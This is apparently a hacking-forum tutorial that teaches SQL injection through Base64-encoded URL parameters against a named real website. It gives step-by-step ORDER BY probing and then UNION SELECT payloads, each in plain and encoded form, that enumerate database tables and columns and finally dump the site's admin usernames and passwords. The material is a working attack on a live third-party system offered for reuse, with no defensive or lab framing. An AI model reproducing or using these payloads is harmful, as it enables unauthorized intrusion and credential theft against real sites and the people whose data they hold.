[How To] SQL Injection using Base64 Encoded Quires

Hello proleets i hope you are fine today i gonna teach you how we can inject website using Base64 Encode Quries so lets start

I have already Base64 injection website

                              =>                       http://aimschennai.in/viewpost.php?id=6 

Ok how we know that this website base 64 yes or no when we try to find order simple using order by we if we got error its mean this website maybe base 64 Like this

=> you can see this when i used order by statement we i got sqli errors

=> Now select vuln id or order by statement
                                           
                                             => 6 order by 1 (Encoding) No error

Click Base64 Encode and Execute

when we encode this you can see  this we don't got any error
Now use this method find orders
                                             => 6 order by 2 (Encoding) No error
                                             => 6 order by 3 (Encoding) No error
                                             => 6 order by 4 (Encoding) No error

=> 6 order by 10 (Encoding) Error See scren short

=> we got 8 orders so now use union select statement or Ecode this

Click Base64 Encode then execute this website

you can see this we got table number now simply use table quries or encode this query

Simple :- http://aimschennai.in/viewpost.php?id=6  UNION ALL SELECT 1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables where table_Schema=database()--+-

Encode :-
http://aimschennai.in/viewpost.php?id=NiAgVU5JT04gQUxMIFNFTEVDVCAxLDIsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpLDQsNSw2LDcsOCBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfU2NoZW1hPWRhdGFiYXNlKCktLSAt

got table data copy aims_user or find columns simply sqli quries
Decode Quries or find table data
Simple : http://aimschennai.in/viewpost.php?id=6  UNION ALL SELECT 1,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_name=CHAR(97, 105, 109, 115, 95, 117, 115, 101, 114)-- -

Encode : http://aimschennai.in/viewpost.php?id=NiAgVU5JT04gQUxMIFNFTEVDVCAxLDIsZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSw0LDUsNiw3LDggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPUNIQVIoOTcsIDEwNSwgMTA5LCAxMTUsIDk1LCAxMTcsIDExNSwgMTAxLCAxMTQpLS0gLQ==

Got all coulmns now we need admin user or password use simple sli quries or Encode this

Simple :http://aimschennai.in/viewpost.php?id=6  UNION ALL SELECT 1,2,group_concat(am_username,0x3a,am_password),4,5,6,7,8 from aims_user

Encode : http://aimschennai.in/viewpost.php?id=NiAgVU5JT04gQUxMIFNFTEVDVCAxLDIsZ3JvdXBfY29uY2F0KGFtX3VzZXJuYW1lLDB4M2EsYW1fcGFzc3dvcmQpLDQsNSw2LDcsOCBmcm9tIGFpbXNfdXNlcg==

Finally we got admin users or password

=> I hope you like this tutorials wattling your comments if you need help about this tutorial Pm me i will help you :)

Join fb : Facebook.com/ProLeEtS